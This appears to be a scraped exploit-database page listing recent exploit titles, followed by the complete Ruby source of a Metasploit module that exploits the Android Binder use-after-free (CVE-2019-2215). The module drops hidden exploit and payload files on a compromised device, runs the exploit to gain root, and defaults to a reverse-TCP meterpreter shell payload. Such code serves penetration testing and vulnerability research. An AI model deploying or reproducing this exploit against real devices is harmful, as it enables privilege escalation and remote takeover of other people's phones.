cf92ea269e
22 changes to exploits/shellcodes Quick N Easy Web Server 3.3.8 - Denial of Service (PoC) Go SSH servers 0.0.2 - Denial of Service (PoC) Android Binder - Use-After-Free (Metasploit) Diamorphine Rootkit - Signal Privilege Escalation (Metasploit) Apache James Server 2.3.2 - Insecure User Creation Arbitrary File Write (Metasploit) Avaya IP Office Application Server 11.0.0.0 - Reflective Cross-Site Scripting ESCAM QD-900 WIFI HD Camera - Remote Configuration Disclosure Real Web Pentesting Tutorial Step by Step - [Persian] AMSS++ v 4.31 - 'id' SQL Injection SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure CandidATS 2.1.0 - Cross-Site Request Forgery (Add Admin) AMSS++ 4.7 - Backdoor Admin Account SecuSTATION SC-831 HD Camera - Remote Configuration Disclosure ATutor 2.2.4 - 'id' SQL Injection I6032B-P POE 2.0MP Outdoor Camera - Remote Configuration Disclosure ManageEngine EventLog Analyzer 10.0 - Information Disclosure eLection 2.0 - 'id' SQL Injection DotNetNuke 9.5 - Persistent Cross-Site Scripting DotNetNuke 9.5 - File Upload Restrictions Bypass Aptina AR0130 960P 1.3MP Camera - Remote Configuration Disclosure Cacti 1.2.8 - Remote Code Execution Windows\x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes)
67 lines
No EOL
2.3 KiB
Ruby
Executable file
67 lines
No EOL
2.3 KiB
Ruby
Executable file
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
class MetasploitModule < Msf::Exploit::Local
|
|
Rank = ExcellentRanking
|
|
|
|
include Msf::Post::File
|
|
include Msf::Post::Common
|
|
include Msf::Exploit::EXE
|
|
include Msf::Exploit::FileDropper
|
|
|
|
def initialize(info={})
|
|
super( update_info( info, {
|
|
'Name' => "Android Binder Use-After-Free Exploit",
|
|
'Description' => %q{
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' => [
|
|
'Jann Horn', # discovery and exploit
|
|
'Maddie Stone', # discovery and exploit
|
|
'grant-h', # Qu1ckR00t
|
|
'timwr', # metasploit module
|
|
],
|
|
'References' => [
|
|
[ 'CVE', '2019-2215' ],
|
|
[ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1942' ],
|
|
[ 'URL', 'https://hernan.de/blog/2019/10/15/tailoring-cve-2019-2215-to-achieve-root/' ],
|
|
[ 'URL', 'https://github.com/grant-h/qu1ckr00t/blob/master/native/poc.c' ],
|
|
],
|
|
'DisclosureDate' => "Sep 26 2019",
|
|
'SessionTypes' => [ 'meterpreter' ],
|
|
'Platform' => [ "android", "linux" ],
|
|
'Arch' => [ ARCH_AARCH64 ],
|
|
'Targets' => [[ 'Auto', {} ]],
|
|
'DefaultOptions' =>
|
|
{
|
|
'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp',
|
|
'WfsDelay' => 5,
|
|
},
|
|
'DefaultTarget' => 0,
|
|
}
|
|
))
|
|
end
|
|
|
|
def upload_and_chmodx(path, data)
|
|
write_file path, data
|
|
chmod(path)
|
|
register_file_for_cleanup(path)
|
|
end
|
|
|
|
def exploit
|
|
local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2019-2215", "exploit" )
|
|
exploit_data = File.read(local_file, {:mode => 'rb'})
|
|
|
|
workingdir = session.fs.dir.getwd
|
|
exploit_file = "#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}"
|
|
upload_and_chmodx(exploit_file, exploit_data)
|
|
payload_file = "#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}"
|
|
upload_and_chmodx(payload_file, generate_payload_exe)
|
|
|
|
print_status("Executing exploit '#{exploit_file}'")
|
|
result = cmd_exec("echo '#{payload_file} &' | #{exploit_file}")
|
|
print_status("Exploit result:\n#{result}")
|
|
end
|
|
end |